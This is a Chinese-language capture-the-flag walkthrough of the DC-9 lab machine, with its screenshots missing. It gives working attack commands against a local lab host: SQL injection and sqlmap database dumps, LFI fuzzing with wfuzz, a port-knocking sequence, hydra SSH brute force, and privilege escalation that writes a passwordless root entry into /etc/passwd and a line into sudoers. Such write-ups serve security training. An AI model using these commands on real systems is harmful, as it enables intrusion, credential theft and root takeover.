DC-9

基础信息收集

NMAP Result：

Nikto Result：

看到只开发了HTTP的80端口，访问。

Search引起了我的注意：

果断抓包送Burp测试看看，请求如图：

加个引号测试一下注入，无果，直接试试' or '1'='1，爆出了所有用户：

确定存在sql注入。

SQL注入

跑sqlmap：

sqlmap -u http://192.168.145.142/results.php --data "search="

爆数据库：

sqlmap -u http://192.168.145.142/results.php --data "search=" --dbs

爆users库：

sqlmap -u http://192.168.145.142/results.php --data "search=" -D users --dump

爆Staff库的表：

sqlmap -u http://192.168.145.142/results.php --data "search=" -D Staff --tables

爆Users表：

没crack出密码出来，一会去网站看看。

爆StaffDetails表：

sqlmap -u http://192.168.145.142/results.php --data "search=" -D Staff -T StaffDetails --dump

没啥有用信息。

爆admin密码

emmm，CMD5要付费，23333，我做个题还要交钱吗，永不为奴！

推荐个网站：https://hashes.com/en/decrypt/hash

拿到密码：

LFI

登录网站发现底部：

象征性测试一下：

emmm，难不成是相对路径，再测试一波：

相对路径伪协议好像就无法搞了，FUZZ走一波看看敏感配置文件好了：

wfuzz -w /usr/share/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt -u http://192.168.145.142/manage.php?file=../../../../FUZZ -b PHPSESSID=q56ip7f0nf6cnrrtqhg1rpi5k3 --hh 1341

读一下：

过滤地看一下：

配置了OpenSSH，但是nmap没有扫描到。

Knockd

说明被藏起来了，扫一下knockd的配置文件：

确实是被隐藏起来了，敲门顺序是7469，8475，9842

nmap敲门并扫描看看：

for x in 7469 8475 9842; do nmap -Pn --max-retries 0 -p $x 192.168.145.142; done
nmap -p22 192.168.145.142

SSH

利用之前爆出的账号和密码，hydra爆破：

hydra -L user -P pwd ssh://192.168.145.142 > ssh_services

挨个登录找找有用信息，最后在用户janitor用户的目录下找到了一些密码：

利用该密码再爆破一次：

hydra -L user -P newpwd ssh://192.168.145.142 >> ssh_services

发现一个新用户，提权有望！

此前已经判断过开始三个用户的提权可能性

提权

登录查看sudo：

发现这个程序：

应该是一个Python的脚本，找找在哪儿：

看一下内容：

追加内容，害，还是老套路提权。

在/etc/passwd加一个用户就好了。

echo "escape::0:0:::/bin/bash" > /tmp/escape
sudo ./test /tmp/escape /etc/passwd

添加成功，正当我想切换到用户escape的时候：

。。。Google了大半天不知道啥问题，算了直接加Sudoers权限吧。。。

echo "fredf    ALL=(ALL:ALL) ALL" > /tmp/escape2
sudo ./test /tmp/escape2 /etc/sudoers

后续测试中，似乎只有使用useradd添加的用户才能切换，不知道是什么情况